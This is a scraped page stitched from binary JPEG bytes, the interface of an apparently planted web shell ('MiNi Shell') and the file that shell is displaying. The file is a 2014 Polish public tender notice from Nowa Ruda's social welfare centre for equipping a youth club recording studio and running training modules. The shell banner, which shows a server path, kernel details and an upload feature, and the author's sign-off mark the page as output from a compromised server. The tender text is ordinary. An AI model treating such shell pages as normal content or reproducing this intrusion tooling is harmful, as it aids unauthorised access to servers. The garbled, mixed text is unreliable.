JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141031/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141031/361974-N-2014.html

<p class="kh_header"><b>Nowa Ruda: Dostawa wraz z montażem, instalacją i wyposażeniem sprzętu dla studia nagrań w Młodzieżowym Klubie wsparcia w Nowej Rudzie wraz z przeprowadzeniem modułów szkoleniowych dla 10 osób z zakresu obsługi studia nagrań.</b><br>
<b>Numer ogłoszenia: 361974 - 2014; data zamieszczenia: 31.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 18, 57-400 Nowa Ruda, woj. dolnośląskie, tel. 074 8721056, faks 074 8721166.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mops.nowaruda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem, instalacją i wyposażeniem sprzętu dla studia nagrań w Młodzieżowym Klubie wsparcia w Nowej Rudzie wraz z przeprowadzeniem modułów szkoleniowych dla 10 osób z zakresu obsługi studia nagrań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z montażem, instalacją i wyposażeniem studia nagrań w Młodzieżowym Klubie Wsparcia w Nowej Rudzie oraz przeprowadzenie modułów szkoleniowych dla 10 osób w zakresie obsługi studia nagrań w ramach Programu Rewitalizacji Społecznej: pt. Nasze miejsca spotkań - tu uczymy się i poznajemy każdego dnia, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet I Zatrudnienie i integracja społeczna, Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, współfinansowanego ze środków Europejskiego Funduszu Społecznego.

Przedmiot zamówienia obejmuję: 
1.Przygotowanie pomieszczenia na potrzeby utworzenia studia nagrań poprzez zmianę układu funkcjonalno użytkowego w Młodzieżowym Klubie Wsparcia. Przewiduję się budowa ścianek działowych techniką szkieletową, wstawienie drzwi i okien, rozbudowa instalacji elektrycznej, pokrycie ścian materiałem dźwiękochłonnym, powierzchnia wydzielonego pomieszczenia ok 12 m kw.

2.Zakup sprzętu studyjnego w szczególności: 
1)interfejs audio: urządzenie pozwalające kierować sygnały analogowe do środowiska cyfrowego,
2)monitory odsłuchowe: pozwalające usłyszeć nagranie realizowane z nagranych śladów,
3)mikrofon: typowy do rejestracji głosu,
4)słuchawki: monitorujące sygnał dla nagrywającego artysty,
5)okablowanie: 10 mb.

3.Zakup komputera stacjonarnego z monitorem i potrzebnymi peryferiami                                 oraz oprogramowanie DAW ( pozwalające rejestrować, edytować i miksować nagrany materiał).

4.Zakup wyposażenia wnętrz:
1)biurko komputerowe,
2)podstawy pod głośniki,
3)statyw z mikrofonem,
4)pulpit do nut/tekstów,
5)fotel,
6)kanapa, stołek.

Zakupiony wyposażenie wnętrz ma stanowić komplet w rozumieniu zachowania kolorystka, użytych materiały itd.

5.Zagadnienia do zrealizowania w czasie modułów:
Moduł 1 - Zapoznanie z infrastrukturą i sprzętem znajdującym się w nowo powstałym studio projektowym, analiza popularnych nagrań dźwiękowych - kształcenie słuchu.
Moduł 2 - Dokładne omówienie poszczególnych procesów realizacji nagrań. Podstawy teoretyczne właściwości fizycznych dźwięku i ich reprezentacja w domenie cyfrowej, szczegółowe omówienie elementów toru audio.
Moduł 3 - Podstawy pracy w środowisku programowym Cubase, organizacja sesji nagraniowej w programie DAW, ćwiczenia praktyczne - rejestrowanie dźwięku głosu ludzkiego.
Moduł 4 - Podstawy miksu w środowisku cyfrowym, dokładne omówienie narzędzie obróbki dźwięku, zajęcia praktyczne z miksu nagranych wcześniej ścieżek.
Moduł 5 - Podstawy produkcji muzycznej, omówienie zasad tworzenia kompozycji muzycznych, zajęcia praktyczne - generowanie dźwięku przy użyciu oprogramowania, rejestracja i miks wytworzonego materiału dźwiękowego.

Czas trwania modułów szkoleniowych: minimum 20 godz. dla jednej osoby (1 godzina odpowiada 1 godzinie dydaktycznej - 45 minut). Na każdy moduł powinno przypadać po min. 4 godz.

Wymagany i pożądany termin przeprowadzenia szkolenia: do 28 listopada 2014 r.,                   w dniach od poniedziałku do soboty.

Miejsce: Młodzieżowy Klub Wsparcia, ul. Bohaterów Getta 10, Gmina Miejska Nowa Ruda. 

Uwagi:
1.Do obowiązków wykonawcy należy: przygotowanie pomieszczenia wraz z 	wykonaniem niezbędnych robót, podłączenie, uruchomienie i konfiguracja sprzętu 	studyjnego w nowopowstałych pomieszczeniach. 
2.Zrealizowanie wszystkich części szkolenia w zakresie określonym w poszczególnych 	modułach.
3.W ramach wykładów teoretycznych powinna odbyć się prelekcja osoby z wieloletnim 	doświadczeniem studyjnym, realizatora pracującego zawodowo w studiu nagrań wraz 	z prezentacjami multimedialnymi.
4.Rekrutację osób do projektu przeprowadzi Zamawiający.
5.Zastosowane metody nauczania muszą uwzględniać indywidualne podejście                      	do każdego  z uczestników.
6.Warunki pracy osób szkolących się w trakcie trwania warsztatów będą zgodne                      	z przepisami bezpieczeństwa i higieny pracy.

Dodatkowe obowiązki Wykonawcy:
1.Odpowiedzialność Wykonawcy z tytułu gwarancji jakości oraz rękojmi za wady 	przedmiotu zamówienia zakończy się po upływie 36 miesięcy od dnia odebrania przez 	Zamawiającego przedmiotu zamówienia (sprzętu i wyposażenia) i podpisania (bez 	uwag) protokołu końcowego. W przypadku, gdy dostarczony i zamontowany sprzęt, 	urządzenia wymagają cyklicznych przeglądów gwarancyjnych Wykonawca wykona je 	bezpłatnie w ramach udzielonej gwarancji. Gwarancja obejmuje również bezpłatną 	wymianę wraz z montażem elementów eksploatacyjnych.
2.Jeżeli w opisie przedmiotu zamówienia, wskazana została nazwa producenta, znak towarowy, patent, pochodzenie lub normy, aprobaty lub specyfikacje techniczne i systemy odniesienia w stosunku do określonych materiałów, urządzeń, itd. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, systemów odniesienia, itd. równoważnych o parametrach nie gorszych niż wskazane. W takiej sytuacji Zamawiający wymaga, o ile to konieczne, złożenia stosownych dokumentów, uwiarygodniających równoważność. 
3.Równoważność, o której mowa powyższej przyjmować należy jako równoważność, o której mowa zarówno w art. 29 ust. 3 ustawy Pzp, jak i art. 30 ust. 4 ustawy Pzp 
4.Wykonawca zapewni dla każdego uczestnika, na własność: niezbędne materiały 	dydaktyczne potrzebne do przyswojenia wiedzy teoretycznej i praktycznej oraz inne 	materiały np. notatnik, długopis itp. z logo Unii Europejskiej, EFS, Narodowej 	Strategii Spójności KAPITAŁ LUDZKI, tytułem projektu o treści: Projekt Nasze 	miejsca spotkań - tu uczymy się poznajemy każdego dnia współfinansowany z 	Europejskiego Funduszu Społecznego w ramach Działania 1.2 Wsparcie 	systemowe instytucji pomocy i integracji społecznej (zgodnie z Wytycznymi 	dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał 	Ludzki);
5.Ubezpieczenie uczestników szkolenia od następstw nieszczęśliwych wypadków, 	przekazanie kopii polisy ubezpieczeniowej do Zamawiającego. Polisa	ubezpieczeniowa musi obejmować pełny okres szkolenia.
6.Wykonawca zapewni swobodny dostęp do sanitariatów dla uczestników.
7.Odpowiednie działania informacyjne i promocyjne zgodne z Wytycznymi 	dotyczącymi realizacji projektów w ramach Programu Operacyjnego Kapitał Ludzki, 	min.: oznaczenia sal szkoleniowych, materiałów szkoleniowych, dokumentów w 	związku   ze współfinansowaniem z Europejskiego Funduszu Społecznego - w 	uzgodnieniu z Zamawiającym.
8.Przeprowadzenie niezbędnych ankiet ewaluacyjnych wstępnych i końcowych                 	oraz ankiet oceniających zajęcia (wzory ankiet należy przedstawić Zamawiającemu 	przed ich wykorzystaniem).
9.Sporządzenie raportu ewaluacyjnego na podstawie ankiet ewaluacyjnych.
10.Przekazanie Zamawiającemu protokołów z egzaminów końcowych, listę osób, które 	ukończyły szkolenie, kserokopię certyfikatów lub zaświadczeń o ukończeniu 	szkolenia, kserokopię oświadczenia o odbiorze certyfikatów lub zaświadczeń o 	ukończeniu szkolenia, obecności uczestników warsztatów, dzienniki zajęć z 	podpisami osób prowadzących warsztaty, inne dokumenty, które wynikną w 	trakcie warsztatów.
11.Wszystkie niezbędne dokumenty związane z realizacją zamówienia należy 	dostarczyć Zamawiającemu najpóźniej w ciągu 3 dni od zakończenia kursu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.33.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o 	spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o 	spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o 	spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o 	spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o 	spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mops.nowaruda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego: 57-400 Nowa Ruda, ul. Kolejowa 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.11.2014 godzina 08:00, miejsce: w siedzibie Zamawiającego, 57-400 Nowa Ruda, ul. Kolejowa 18, nr lokalu  202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach Programu Rewitalizacji Społecznej: pt. Nasze miejsca spotkań - tu uczymy się i poznajemy każdego dnia, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet I Zatrudnienie i integracja społeczna, Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, współfinansowanego ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com